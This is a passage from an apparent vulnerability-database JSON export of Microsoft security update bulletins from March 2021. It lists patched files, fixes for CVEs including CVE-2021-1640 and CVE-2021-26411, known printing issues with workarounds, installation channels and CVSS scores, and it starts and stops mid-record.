11:36| 142,848 \nurlmon.dll| 9.0.8112.21532| 13-Feb-2021| 11:38| 1,141,248 \ninetcpl.cpl| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,427,968 \nwininet.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 1,132,032 \njsproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 75,776 \nWininetPlugin.dll| 1.0.0.1| 13-Feb-2021| 11:36| 66,048 \ntdc.ocx| 9.0.8112.21532| 13-Feb-2021| 11:35| 63,488 \niedvtool.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 678,912 \ndxtmsft.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 354,304 \ndxtrans.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 223,744 \nmsfeeds.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 607,744 \nmsfeeds.mof| Not versioned| 13-Feb-2021| 11:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Feb-2021| 11:11| 1,574 \nmsfeedsbs.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 41,472 \nmsfeedssync.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 10,752 \nmshta.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 11,776 \nhtml.iec| 2019.0.0.21527| 13-Feb-2021| 11:40| 367,616 \nmshtmled.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 72,704 \nmshtml.dll| 9.0.8112.21532| 13-Feb-2021| 11:45| 12,844,544 \nmshtml.tlb| 9.0.8112.21532| 13-Feb-2021| 11:35| 2,382,848 \nielowutil.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 223,232 \nieproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 195,072 \nIEShims.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 194,560 \nExtExport.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 22,528 \njsdbgui.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 388,096 \niertutil.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 13-Feb-2021| 11:48| 142,776 \nVGX.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 769,024 \nurl.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 231,936 \nieframe.dll| 9.0.8112.21532| 13-Feb-2021| 11:39| 9,757,696 \nieui.dll| 9.0.8112.21532| 13-Feb-2021| 11:34| 176,640 \nieinstal.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 474,624 \njsdebuggeride.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 104,448 \njscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 723,456 \njscript9.dll| 9.0.8112.21532| 13-Feb-2021| 11:43| 1,819,648 \nvbscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 434,176 \n \n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## References\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "KB5000800: Cumulative security update for Internet Explorer: March 9, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000800", "href": "https://support.microsoft.com/en-us/help/5000800", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:31:20", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1803 update history home page.\n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, the Windows Kernel, the Microsoft Graphics Component, Windows Graphics, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001565. \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001634. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4580398) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000809>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000809](<https://download.microsoft.com/download/9/0/d/90d4abf0-4129-404c-be46-5a1798eab386/5000809.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000809 (OS Build 17134.2087)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000809", "href": "https://support.microsoft.com/en-us/help/5000809", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:31:21", "description": "None\n**2/16/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.1817) released March 9, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows Fundamentals, Windows Management, Windows Apps, Windows User Account Control (UAC), Windows Core Networking, Windows Hybrid Cloud Networking, the Windows Kernel, Windows Virtualization, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note** If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC** recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001568. \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001638. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5000859) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000822>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000822](<https://download.microsoft.com/download/f/2/f/f2fc2870-838b-4900-aaa6-4e1168d79b43/5000822.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000822 (OS Build 17763.1817)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000822", "href": "https://support.microsoft.com/en-us/help/5000822", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:31:24", "description": "None\n**Important: ** \n \nWindows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n**Important: ****March 9, 2021** \nAs part of the end of support for Adobe Flash, [KB4577586](<https://support.microsoft.com/help/4577586>) is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586[ ](<https://support.microsoft.com/help/4577586>). For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601384](<https://support.microsoft.com/help/4601384>) (released February 9, 2021) and addresses the following issues:\n\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, Windows Media, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001640. \n \n## How to get this update\n\n### Before installing this update\n\nWe strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000848>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for update 5000848](<https://download.microsoft.com/download/0/0/3/0036604e-4a48-4a7e-a819-1a9c3657f829/5000848.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000848 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000848", "href": "https://support.microsoft.com/en-us/help/5000848", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:31:22", "description": "None\n**Important: **Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**Important: **For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601360](<https://support.microsoft.com/help/4601360>) (released February 9, 2021) and addresses the following issues: \n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, and Windows Hybrid Cloud Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001642. \n \n## How to get this update\n\n### Before installing this update\n\n**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n\n### **Prerequisite**\n\nYou must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000844>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5000844](<https://download.microsoft.com/download/b/4/c/b4ca9728-4c2d-46fd-b3b9-769235c4305a/5000844.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000844 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000844", "href": "https://support.microsoft.com/en-us/help/5000844", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:31:20", "description": "None\n**NEW 3/9/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Turns off token binding by default in Windows Internet (WinINet).\n * Addresses an issue in the Windows Management Instrumentation (WMI) service that causes a heap leak each time security settings are applied to WMI namespace permissions.\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, 